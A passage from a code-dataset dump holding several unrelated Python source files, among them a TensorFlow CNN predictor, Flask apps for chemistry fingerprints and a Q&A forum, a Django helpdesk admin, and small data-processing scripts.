shape[3] * shape[4]\n convo_2_flat = tf.reshape(full_one_dropout, [-1, s])\n\n elif self.trial == 2:\n convo_1 = tf.keras.layers.Conv3D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling3D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_1 = convo_1_pool(convo_1(tf.expand_dims(x1, axis=4)))\n full_one_dropout = tf.nn.dropout(cnn_1, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n convo_1_flat = tf.reshape(full_one_dropout, [-1, shape[1], shape[2] * shape[3], shape[4]])\n\n convo_2 = tf.keras.layers.Conv2D(filters=int(filters),\n kernel_size=kernels[:-1],\n padding=\"same\",\n name='cnn2',\n activation=tf.nn.elu)\n\n convo_2_pool = tf.keras.layers.AveragePooling2D(pool_size=self.pool_size[:-1], strides=1,\n name='pool2')\n cnn_output = convo_2_pool(convo_2(convo_1_flat))\n full_two_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_two_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3]\n convo_2_flat = tf.reshape(full_two_dropout, [-1, s])\n elif self.trial == 3:\n convo_1 = tf.keras.layers.Conv3D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling3D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_1 = convo_1_pool(convo_1(tf.expand_dims(x1, axis=4)))\n full_one_dropout = tf.nn.dropout(cnn_1, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3] * shape[4]\n convo_1_flat = tf.reshape(full_one_dropout, [-1, s], name='reshape1')\n\n full_layer_middle = tf.keras.layers.Dense(units=2000, activation=tf.nn.elu, name='dense_middle')\n full_middle_dropout = tf.nn.dropout(full_layer_middle(convo_1_flat), rate=1 - hold_prob)\n full_middle_dropout = tf.reshape(full_middle_dropout, [-1, 10, 20, 10], name='reshape2')\n\n convo_2 = tf.keras.layers.Conv2D(filters=int(filters),\n kernel_size=kernels[:-1],\n padding=\"same\",\n name='cnn2',\n activation=tf.nn.elu)\n\n convo_2_pool = tf.keras.layers.AveragePooling2D(pool_size=self.pool_size[:-1], strides=1,\n name='pool2')\n cnn_output = convo_2_pool(convo_2(full_middle_dropout))\n full_two_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_two_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3]\n convo_2_flat = tf.reshape(full_two_dropout, [-1, s])\n\n full_layer_one = tf.keras.layers.Dense(units=h_size[0], activation=tf.nn.elu, name='dense1')\n\n full_layer_two = tf.keras.layers.Dense(units=h_size[1], activation=tf.nn.elu, name='dense2')\n full_two_dropout = tf.nn.dropout(full_layer_one(convo_2_flat), keep_prob=hold_prob)\n dense_output = tf.nn.dropout(full_layer_two(full_two_dropout), keep_prob=hold_prob)\n\n y_pred, W, b = self.normal_full_layer(dense_output, best_weights['build_rbf_cnn/Variable:0'],\n best_weights['build_rbf_cnn/Variable_1:0'])\n if self.trial == 1 or self.trial == 0:\n weights = convo_1.trainable_weights + full_layer_one.trainable_weights + full_layer_two.trainable_weights + [\n W, b]\n return y_pred, weights, convo_1, full_layer_one, full_layer_two\n elif self.trial == 2:\n weights = convo_1.trainable_weights + convo_2.trainable_weights + full_layer_one.trainable_weights + full_layer_two.trainable_weights + [\n W, b]\n return y_pred, weights, convo_1, convo_2, full_layer_one, full_layer_two\n else:\n weights = convo_1.trainable_weights + full_layer_middle.trainable_weights + convo_2.trainable_weights + full_layer_one.trainable_weights + full_layer_two.trainable_weights + [\n W, b]\n return y_pred, weights, convo_1, convo_2, full_layer_middle, full_layer_one, full_layer_two\n\n def predict(self, X):\n filters = self.model['filters']\n kernels = self.model['kernels']\n h_size = self.model['h_size']\n best_weights = self.model['best_weights']\n H = self.create_inputs(X)\n\n tf.compat.v1.reset_default_graph()\n graph_cnn = tf.Graph()\n with graph_cnn.as_default():\n with tf.device(\"/cpu:0\"):\n x1 = tf.compat.v1.placeholder('float', shape=[None, self.D, self.num_centr, self.depth],\n name='input_data')\n hold_prob = tf.compat.v1.placeholder(tf.float32, name='drop')\n with tf.device(\"/cpu:0\"):\n\n if self.trial == 1 or self.trial == 0:\n y_pred_, weights, convo_1, full_layer_one, full_layer_two = self.build_graph(x1, best_weights,\n kernels, h_size,\n hold_prob, filters)\n elif self.trial == 2:\n y_pred_, weights, convo_1, convo_2, full_layer_one, full_layer_two = self.build_graph(x1,\n best_weights,\n kernels,\n h_size,\n hold_prob,\n filters)\n else:\n y_pred_, weights, convo_1, convo_2, full_layer_middle, full_layer_one, full_layer_two = self.build_graph(\n x1, best_weights, kernels, h_size, hold_prob, filters)\n\n config_tf = tf.compat.v1.ConfigProto(allow_soft_placement=True)\n config_tf.gpu_options.allow_growth = True\n\n with tf.compat.v1.Session(graph=graph_cnn, config=config_tf) as sess:\n print('Open an rbf-cnn network with %s' % self.num_centr)\n\n sess.run(tf.compat.v1.global_variables_initializer())\n if self.trial == 1 or self.trial == 0:\n convo_1.set_weights(\n [best_weights['build_rbf_cnn/cnn1/kernel:0'], best_weights['build_rbf_cnn/cnn1/bias:0']])\n elif self.trial == 2:\n convo_1.set_weights(\n [best_weights['build_rbf_cnn/cnn1/kernel:0'], best_weights['build_rbf_cnn/cnn1/bias:0']])\n convo_2.set_weights(\n [best_weights['build_rbf_cnn/cnn2/kernel:0'], best_weights['build_rbf_cnn/cnn2/bias:0']])\n else:\n convo_1.set_weights(\n [best_weights['build_rbf_cnn/cnn1/kernel:0'], best_weights['build_rbf_cnn/cnn1/bias:0']])\n convo_2.set_weights(\n [best_weights['build_rbf_cnn/cnn2/kernel:0'], best_weights['build_rbf_cnn/cnn2/bias:0']])\n full_layer_middle.set_weights(\n [best_weights['build_rbf_cnn/dense_middle/kernel:0'],\n best_weights['build_rbf_cnn/dense_middle/bias:0']])\n\n full_layer_one.set_weights(\n [best_weights['build_rbf_cnn/dense1/kernel:0'], best_weights['build_rbf_cnn/dense1/bias:0']])\n full_layer_two.set_weights(\n [best_weights['build_rbf_cnn/dense2/kernel:0'], best_weights['build_rbf_cnn/dense2/bias:0']])\n\n y_pred, weights_run = sess.run([y_pred_, weights],\n feed_dict={x1: H, hold_prob: 1})\n\n sess.close()\n\n return y_pred\n","sub_path":"Fuzzy_clustering/version2/deep_models/cnn_predict.py","file_name":"cnn_predict.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"115900726","text":"from flask import Flask\nfrom flask import render_template, request\nfrom form import *\n\nfrom predict.views import *\nfrom convert.views import *\nfrom werkzeug.utils import secure_filename\n\nUPLOAD_FOLDER = 'uploads'\nALLOWED_EXTENSIONS = {'csv'}\njpype.addClassPath('cdk-2.3.jar')\nstartJVM(getDefaultJVMPath(), \"-ea\")\n\n\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n# @app.route('/')\n# def base():\n# return render_template('base.html')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\n@app.route('/base')\ndef base():\n return render_template('base.html')\n\n\n\n@app.route('/predict', methods = ['POST', 'GET'])\ndef predict():\n form = PredictForm()\n\n if request.method == 'POST':\n\n result = request.form\n smiles = result.get('smiles')\n alt = int(result.get('al_fingerprint'))\n print(alt)\n PCE = RegressionPredit(smiles, alt)\n print(PCE)\n # message = []\n # message.append(PCE)\n # print(smiles)\n # print(type(result))\n # print(result)\n return render_template(\"predict.html\", form=form, result= PCE)\n\n return render_template('predict.html', form=form)\n\n\n# @app.route('/result',methods = ['POST', 'GET'])\n# def result():\n# if request.method == 'POST':\n# result = request.form\n# return render_template(\"result.html\",result = result)\n\n\n\n\n@app.route('/convert', methods = ['POST', 'GET'])\ndef convert():\n form = ConvertForm()\n if request.method == 'POST':\n result = request.form\n #print(request.files)\n try:\n if result.get('smiles') != None:\n f_func = FingerprintType(int(result.get('fingerprint')))\n SingleSmilesConvert(f_func, result.get('smiles'), savename='csv/fingerprint.csv')\n\n return send_file('csv/fingerprint.csv', mimetype='text/csv',\n as_attachment=True, attachment_filename=\"fingerprint.csv\")\n\n\n elif request.files != None:\n request.files.get('file').save('uploads/fingerprint.csv')\n file = 'uploads/fingerprint.csv'\n print(result.get('fingerprint'))\n f_func = FingerprintType(int(result.get('fingerprint')))\n FileSmilesConvert(f_func, namecol=1, PCEcol=2, smilescol=3, filename='uploads/fingerprint.csv', savename='csv/file_fingerprint.csv')\n return send_file('csv/file_fingerprint.csv', mimetype='text/csv',\n as_attachment=True, attachment_filename=\"file_fingerprint.csv\")\n except:\n pass\n return render_template('convert.html',form=form)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\n#\n# @app.route('/')\n# def hello_world():\n# return 'Hello World!'\nimport os\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n #startJVM(getDefaultJVMPath(), \"-ea\")\n app.config.from_mapping(\n SECRET_KEY='dev',\n # DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n # a simple page that says hello\n # @app.route('/')\n # def hello():\n # return 'Hello, World!'\n\n # from . import db\n # db.init_app(app)\n #\n # from . import auth\n # app.register_blueprint(auth.bp)\n #\n # from . import blog\n # app.register_blueprint(blog.bp)\n # app.add_url_rule('/', endpoint='index')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"163661976","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\nfrom flask_paginate import Pagination, get_page_args\nfrom flaskr.auth import login_required\nfrom flaskr.db import get_db\nimport time\nfrom . import ESsearch\n\nbp = Blueprint('question', __name__)\n\ndef get_posts(offset=0, per_page=12,posts=[]):\n return posts[offset: offset + per_page]\n\n@bp.route('/')\ndef index():\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n db=get_db()\n posts = db.execute(\n 'SELECT *'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n total=len(posts)\n pagination_posts = get_posts(offset=offset, per_page=per_page,posts=posts)\n pagination = Pagination(page=page, per_page=per_page, total=total,\n css_framework='bootstrap4')\n return render_template('question/index.html',posts=pagination_posts,\n page=page,\n per_page=per_page,\n pagination=pagination,)\n\n\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n tag=request.form['tag']\n #print tag\n tags=tag.split(',')\n # s=string(tag)\n # print s\n error = None\n searchobj = ESsearch.ESearch()\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'INSERT INTO post (author_id,title,body)'\n ' VALUES (?, ?, ?)',\n ( g.user['id'],title, body)\n )\n x=db.execute( 'SELECT max(qid) as maximum FROM post').fetchone()\n data=db.execute(\"SELECT * FROM user WHERE id = ?\", (g.user['id'],)).fetchone()\n lastid = int(x[0])\n tdata = db.execute(\"SELECT * from post where qid = ?\",(lastid,)).fetchone()\n searchobj.insert(int(tdata[0]), int(tdata[1]), tdata[2], int(tdata[3]), tdata[4], tdata[5], tdata[6])\n \n flag=0\n if(data[5]>5) and tags is not None:\n for i in tags:\n db.execute(\n 'INSERT INTO qtags (tagname,qid)'\n ' VALUES (?, ?)',\n (i,x[0])\n )\n r=db.execute(\"SELECT * FROM tags WHERE tagname = ?\", (i,)).fetchone()\n if(r is None):\n db.execute(\n 'INSERT INTO tags (tagname)'\n ' VALUES (?)',\n (i,)\n )\n db.execute('INSERT INTO TagDescription (tagname)'\n 'VALUES (?)',\n (i,))\n\n else:\n for i in tags:\n data=db.execute(\"SELECT * FROM tags WHERE tagname = ?\", (i,)).fetchone()\n if(data is None):\n flag=1\n break\n else:\n continue\n if(flag==0):\n for i in tags:\n db.execute(\n 'INSERT INTO qtags (tagname,qid)'\n ' VALUES (?, ?)',\n (i,x[0])\n )\n else:\n print (\"NO REPUTATION TO ADD TAGS\")\n\n # print x['qid']\n #print x[0]\n \n db.commit()\n return redirect(url_for('question.index'))\n\n return render_template('question/create.html')\n\ndef get_question(id, check_author=True):\n post = get_db().execute(\n 'SELECT qid, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE qid = ?',\n (id,)\n ).fetchone()\n\n if post is None:\n abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n if check_author and post['author_id'] != g.user['id']:\n abort(403)\n\n return post\n\n@bp.route('//update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n post = get_question(id)\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n searchobj = ESsearch.ESearch()\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'UPDATE post SET title = ?, body = ?'\n ' WHERE qid = ?',\n (title, body, id)\n )\n db.commit()\n lastid = int(id)\n tdata = db.execute(\"SELECT * from post where qid = ?\",(lastid,)).fetchone()\n searchobj.insert(int(tdata[0]), int(tdata[1]), tdata[2], int(tdata[3]), tdata[4], tdata[5], tdata[6])\n \n return redirect(url_for('question.index'))\n\n return render_template('question/update.html', post=post)\n\n@bp.route('/search', methods=('POST','GET'))\ndef search():\n print(request.method)\n if request.method == 'GET':\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n db=get_db() \n pattern = request.args.get('tagname')\n print(pattern)\n if len(pattern)>0:\n newpat = str(pattern)\n tdata = db.execute(\"SELECT * from qtags where tagname = ?\",(newpat,)).fetchall()\n posts = []\n for item in tdata:\n resp = db.execute(\n 'SELECT qid, title, body, created, author_id, username,profile_picture'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE p.qid = ?', (int(item[1]),)\n ).fetchall()\n for items in resp:\n posts.append(items)\n \n total=len(posts) \n pagination_posts = get_posts(offset=offset, per_page=per_page,posts=posts)\n pagination = Pagination(page=page, per_page=per_page, total=total,\n css_framework='bootstrap4')\n return render_template('question/index.html',posts=pagination_posts,\n page=page,\n per_page=per_page,\n pagination=pagination,)\n else:\n return \"Something wrong with the tag name!\"\n\n if request.method == 'POST':\n\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n db=get_db() \n pattern = request.form['pattern']\n if len(pattern)>0:\n if(pattern[0] == '[' and pattern[len(pattern)-1] == ']'):\n pattern = pattern[1:(len(pattern)-1)]\n newpat = ''.join(pattern)\n tdata = db.execute(\"SELECT * from qtags where tagname = ?\",(newpat,)).fetchall()\n posts = []\n for item in tdata:\n resp = db.execute(\n 'SELECT qid, title, body, created, author_id, username,profile_picture'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE p.qid = ?', (int(item[1]),)\n ).fetchall()\n for items in resp:\n posts.append(items)\n\n else:\n searchobj = ESsearch.ESearch()\n posts = searchobj.search(pattern)\n\n total=len(posts) \n pagination_posts = get_posts(offset=offset, per_page=per_page,posts=posts)\n pagination = Pagination(page=page, per_page=per_page, total=total,\n css_framework='bootstrap4')\n return render_template('question/index.html',posts=pagination_posts,\n page=page,\n per_page=per_page,\n pagination=pagination,)\n else:\n return \"Please Enter Something to search!\"\n\n else:\n return \"something wrong happened!\"\n\n@bp.route('//delete', methods=('POST',))\n@login_required\ndef delete(id):\n print(\"HI\")\n get_question(id)\n db = get_db()\n db.execute('DELETE FROM post WHERE qid = ?', (id,))\n db.commit()\n searchobj = ESsearch.ESearch()\n searchobj.delete(int(id))\n return redirect(url_for('question.index'))\n\n\n@bp.route('//que', methods=('GET','POST'))\ndef que(id):\n db = get_db()\n db = get_db()\n posts=db.execute('SELECT qid, title, body, created, author_id, username, upvotes,profile_picture'\n ' FROM post p JOIN user u ON p.author_id = u.id where qid =?' , (id,)).fetchone()\n tags=db.execute('SELECT * FROM qtags where qid=?',(id,)).fetchall()\n comments=db.execute('SELECT * FROM comment_question WHERE qid=?',(id,)).fetchall()\n ans=db.execute('SELECT * FROM answer a JOIN user u ON a.author_id=u.id WHERE qid = ? ORDER BY a.accepted DESC, upvotes DESC', (id,)).fetchall()\n ans_len=len(ans)\n comments_len=len(comments)\n tag_len=len(tags)\n list1={}\n tag_len=len(tags)\n for i in ans:\n # print \"hello\"\n # print i['id']\n # print \"temp\"\n ans4=db.execute('SELECT * FROM comment_answer WHERE ans_id=?',(i['id'],)).fetchall()\n # print len(ans4)\n list1[i['id']]=ans4\n # print len(list1[i['id']])\n # comments_len_ans=len(ans1)\n return render_template('question/que.html',posts=posts,ans=ans,ans_len=ans_len,comments=comments,comments_len=comments_len,tags=tags,tag_len=tag_len,list1=list1)\n\n\n\n@bp.route('//create_comment', methods=('GET', 'POST'))\n@login_required\ndef create_comment(id):\n if request.method == 'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'INSERT INTO comment_question(qid,author_id,body)'\n ' VALUES (?, ?, ?)',\n (id,g.user['id'], body)\n )\n db.commit()\n return redirect(url_for('question.que',id=id))\n\n return render_template('question/create_comment.html')\n\n\n@bp.route('//upvote_question', methods=('GET', 'POST'))\n@login_required\ndef upvote_question(id):\n db = get_db()\n result=db.execute('select * from upvote_que where qid=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==2:\n db.execute('UPDATE upvote_que SET upvote_downvote=? WHERE qid = ? and userid=?',(1,id,g.user['id']))\n db.execute('UPDATE post SET upvotes= upvotes + 1 WHERE qid = ?',(id,))\n else:\n db.execute('insert into upvote_que(qid,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],1)) \n db.execute('UPDATE post SET upvotes=upvotes+1 WHERE qid = ?',(id,))\n db.commit()\n return redirect(url_for('question.que',id=id))\n\n\n@bp.route('//downvote_question', methods=('GET', 'POST'))\n@login_required\ndef downvote_question(id):\n db = get_db()\n result=db.execute('select * from upvote_que where qid=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==1:\n db.execute('UPDATE upvote_que SET upvote_downvote=? WHERE qid = ? and userid=?',(2,id,g.user['id']))\n db.execute('UPDATE post SET upvotes=(upvotes-1) WHERE qid = ?',(id,))\n else:\n db.execute('insert into upvote_que(qid,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],2))\n db.execute('UPDATE post SET upvotes=(upvotes-1) WHERE qid = ?',(id,)) \n db.commit()\n return redirect(url_for('question.que',id=id)) \n\n\n@bp.route('//upvote_answer', methods=('GET', 'POST'))\n@login_required\ndef upvote_answer(id):\n db = get_db()\n result=db.execute('select * from upvote_ans where id=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==2:\n db.execute('UPDATE upvote_ans SET upvote_downvote=? WHERE id = ? and userid=?',(1,id,g.user['id']))\n db.execute('UPDATE answer SET upvotes= upvotes + 1 WHERE id = ?',(id,))\n else:\n db.execute('insert into upvote_ans(id,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],1)) \n db.execute('UPDATE answer SET upvotes=upvotes+1 WHERE id = ?',(id,))\n res=db.execute('select qid from answer where id=?',(id,)).fetchone()\n db.commit()\n return redirect(url_for('question.que',id=res['qid']))\n\n\n@bp.route('//downvote_answer', methods=('GET', 'POST'))\n@login_required\ndef downvote_answer(id):\n db = get_db()\n result=db.execute('select * from upvote_ans where id=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==1:\n db.execute('UPDATE upvote_ans SET upvote_downvote=? WHERE id = ? and userid=?',(2,id,g.user['id']))\n db.execute('UPDATE answer SET upvotes=(upvotes-1) WHERE id = ?',(id,))\n else:\n db.execute('insert into upvote_ans(id,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],2))\n db.execute('UPDATE answer SET upvotes=(upvotes-1) WHERE id = ?',(id,)) \n db.commit()\n res=db.execute('select qid from answer where id=?',(id,)).fetchone()\n return redirect(url_for('question.que',id=res['qid'])) \n\n\n@bp.route('//createanswer', methods=('GET', 'POST'))\n@login_required\ndef createanswer(id):\n if request.method == 'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'INSERT INTO answer (qid,author_id,body)'\n ' VALUES (?, ?, ?)',\n (id, g.user['id'], body)\n )\n db.execute(\n 'UPDATE user SET reputation =reputation+1 '\n ' WHERE id = ?',\n (g.user['id'],)\n ) \n db.commit()\n return redirect(url_for(\"question.que\", id=id))\n\n return render_template('question/createanswer.html')\n\n@bp.route('///create_comment_ans', methods=('GET', 'POST'))\n@login_required\ndef create_comment_ans(qid,aid):\n if request.method == 'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'INSERT INTO comment_answer(ans_id,author_id,body)'\n ' VALUES (?, ?, ?)',\n (aid,g.user['id'], body)\n )\n db.commit()\n return redirect(url_for('question.que',id=qid))\n\n return render_template('question/create_comment_ans.html')\n\ndef get_answer(id, check_author=True):\n post = get_db().execute(\n 'SELECT p.id, qid, body, created, author_id, username'\n ' FROM answer p JOIN user u ON p.author_id = u.id'\n ' WHERE p.id = ?',\n (id,)\n ).fetchone()\n\n if post is None:\n abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n if check_author and post['author_id'] != g.user['id']:\n abort(403)\n\n return post\n\n\n@bp.route('//updateanswer', methods=('GET', 'POST'))\n@login_required\ndef updateanswer(id):\n post = get_answer(id)\n\n if request.method == 'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'UPDATE answer SET body = ?'\n ' WHERE id = ?',\n (body, id)\n )\n db.commit()\n return redirect(url_for('question.que', id=post['qid']))\n\n return render_template('question/updateanswer.html', post=post)\n\n@bp.route('//deleteanswer', methods=('POST',))\n@login_required\ndef deleteanswer(id):\n print (id)\n q = get_answer(id)\n db = get_db()\n db.execute('DELETE FROM answer WHERE id = ?', (id,))\n db.commit()\n return redirect(url_for('question.que', id=q['qid']))\n\n@bp.route('///accept_answer', methods=('GET', 'POST'))\n@login_required\ndef accept_answer(aid, qid):\n db = get_db()\n result=db.execute('select * from post where qid=? and author_id=?',(qid,g.user['id'])).fetchone()\n res = db.execute('select * from answer where id =?',(aid,)).fetchone()\n if result is not None and result['accepted']!=1 and res['author_id']!=g.user['id']:\n db.execute('UPDATE user SET reputation= reputation + 5 where id =?',(res['author_id'],))\n db.execute('UPDATE post SET accepted =1 where qid =?',(qid,))\n db.execute('UPDATE answer SET accepted= 1 WHERE id = ?',(aid,))\n res=db.execute('select qid from answer where id=?',(aid,)).fetchone()\n db.commit()\n return redirect(url_for('question.que',id=res['qid']))\n\n@bp.route('/about', methods=('POSTS','GET'))\ndef about():\n return render_template(\"question/about.html\")\n\n@bp.errorhandler(404)\ndef page_not_found(e):\n return render_template('auth/404.html'), 404","sub_path":"flaskr/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":17547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"8233152","text":"# Register your models here.\r\nfrom django.contrib import admin\r\nfrom django.utils.translation import ugettext_lazy as _\r\n\r\nfrom .models import (Attachment, EmailTemplate, FollowUp, KBCategory, KBItem,\r\n PreSetReply, Queue, Ticket, TicketCC, TicketChange,\r\n TicketDependency)\r\n\r\n\r\n@admin.register(Queue)\r\nclass QueueAdmin(admin.ModelAdmin):\r\n list_display = ('title', 'slug', 'email_address')\r\n prepopulated_fields = {\"slug\": (\"title\",)}\r\n\r\n@admin.register(Ticket)\r\nclass TicketAdmin(admin.ModelAdmin):\r\n list_display = ('title', 'status', 'assigned_to', 'queue', 'hidden_submitter_email',)\r\n date_hierarchy = 'created'\r\n list_filter = ('queue', 'assigned_to', 'status')\r\n\r\n def hidden_submitter_email(self, ticket):\r\n if ticket.submitter_email:\r\n username, domain = ticket.submitter_email.split(\"@\")\r\n username = username[:2] + \"*\" * (len(username) - 2)\r\n domain = domain[:1] + \"*\" * (len(domain) - 2) + domain[-1:]\r\n return \"%s@%s\" % (username, domain)\r\n else:\r\n return ticket.submitter_email\r\n hidden_submitter_email.short_description = _('Submitter E-Mail')\r\n\r\n\r\nclass TicketChangeInline(admin.StackedInline):\r\n model = TicketChange\r\n\r\nclass AttachmentInline(admin.StackedInline):\r\n model = Attachment\r\n\r\n@admin.register(FollowUp)\r\nclass FollowUpAdmin(admin.ModelAdmin):\r\n inlines = [TicketChangeInline, AttachmentInline]\r\n list_display = ('ticket_get_ticket_for_url', 'title', 'date', 'ticket', 'user', 'new_status')\r\n list_filter = ('user', 'date', 'new_status')\r\n\r\n def ticket_get_ticket_for_url(self, obj):\r\n return obj.ticket.ticket_for_url\r\n ticket_get_ticket_for_url.short_description = _('Slug')\r\n\r\n\r\n@admin.register(KBItem)\r\nclass KBItemAdmin(admin.ModelAdmin):\r\n list_display = ('category', 'title', 'last_updated',)\r\n list_display_links = ('title',)\r\n\r\n\r\n# @admin.register(CustomField)\r\n# class CustomFieldAdmin(admin.ModelAdmin):\r\n# list_display = ('name', 'label', 'data_type')\r\n\r\n\r\n@admin.register(EmailTemplate)\r\nclass EmailTemplateAdmin(admin.ModelAdmin):\r\n list_display = ('template_name', 'heading')\r\n\r\n\r\nadmin.site.register(PreSetReply)\r\nadmin.site.register(KBCategory)\r\nadmin.site.register(TicketCC)\r\nadmin.site.register(TicketDependency)\r\n","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"147080512","text":"# Create a function named over_nine_thousand() that takes a list of numbers named lst as a parameter.\n\n# The function should sum the elements of the list until the sum is greater than 9000.\n# When this happens, the function should return the sum.\n# If the sum of all of the elements is never greater than 9000,\n# the function should return total sum of all the elements.\n# If the list is empty, the function should return 0.\n\n# For example, if lst was [8000, 900, 120, 5000], then the function should return 9020.\n\n#Write your function here\ndef over_nine_thousand(lst):\n # Create variable lst_sum\n lst_sum = 0\n # Iterate through lst\n for num in lst:\n # If lst_sum < 9000\n if (lst_sum < 9000):\n # Add num to lst_sum\n lst_sum += num\n # Else lst_sum > 9000\n else:\n # Break out of for loop\n break\n # Return lst_sum\n return lst_sum\n\n#Uncomment the line below when your function is done\nprint(over_nine_thousand([8000, 900, 120, 5000]))\n","sub_path":"Lesson 05: Loops/Lesson 02: Code Challenge: Loops/Exercise 08: Over 9000.py","file_name":"Exercise 08: Over 9000.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"608356233","text":"import csv\nimport xml.etree.ElementTree\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nfrom sklearn.preprocessing import minmax_scale\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\nlabels_images = defaultdict(list)\n@app.route(\"/\")\ndef visualise_top_images():\n return render_template('task6a.html', labels_images=labels_images)\n\n\n###########################################################################\n##GET INPUT\nCSV_folder= input(\"Enter the directory path for CSV files \")\nlabelsFile=input(\"enter image-labels file path\")\nKValue=input(\"Enter K value for KNN\")\nglobal_image_ids=[]\nLabelDict={}\nLabelled_ImagesIds=[]\nLabels=[]\n#Extract labelled images data from input file\ndef ExtractData():\n with open(labelsFile) as f:\n Qfile = f.read().splitlines()\n for line in Qfile:\n arr=line.split(\" \")\n id=int(arr[0])\n n=len(arr)-1\n label=arr[n]\n LabelDict[id]=label\n Labelled_ImagesIds.append(id)\n if label not in Labels:\n Labels.append(label)\n\nExtractData()\n##Create Matrix from file\ndef WriteFileToMatrix(filename, id_append):\n global global_image_ids\n ListOfLists=[]\n with open(CSV_folder+\"\\\\\"+filename,\"r\",) as file:\n reader = csv.reader(file)\n for row in reader:\n TemList=[]\n for element in row:\n TemList.append(float(element))\n if id_append:\n global_image_ids.append(int(TemList.pop(0)))\n ListOfLists.append(TemList)\n return ListOfLists\n\n##Get all files names\ndef GetAllFileNames():\n filenames=[]\n for filename in os.listdir(CSV_folder):\n filenames.append(filename)\n return filenames\n\n##Get all matricies of a model\ndef GetMatrixWithAllFeatures(i):\n Obj_feature_Matrix=None\n allFiles=GetAllFileNames()\n count=0\n first=True\n while(count<10):\n if(first):\n Obj_feature_Matrix=WriteFileToMatrix(allFiles[count+i],True)\n first=False\n else:\n Obj_feature_Matrix= np.hstack((Obj_feature_Matrix,WriteFileToMatrix(allFiles[count+i], False)))\n count=count+1\n return Obj_feature_Matrix\n\ndef GetMatrix():\n Matrix=[]\n first=True\n n=len(GetAllFileNames())\n i=0\n while(i 1:\n # Fixing duplicated sample names\n critical('Error: sample ' + old_sname + ' met in ' + str(len(projs_with_this_sample)) + ' projects: ' +\n ', '.join(p.project_name for p in projs_with_this_sample) + '.')\n info('Sample ' + old_sname + ' met in ' + str(len(projs_with_this_sample)) + ' projects: ' +\n ', '.join(p.project_name for p in projs_with_this_sample) + '. Adding postfixes.')\n for p in projs_with_this_sample:\n for new_sample in new_samples_by_project[p]:\n new_sample.sample_info['description_original'] = new_sample.name\n new_sample.name = new_sample.sample_info['description'] + '_' + projs_with_this_sample.project_name\n 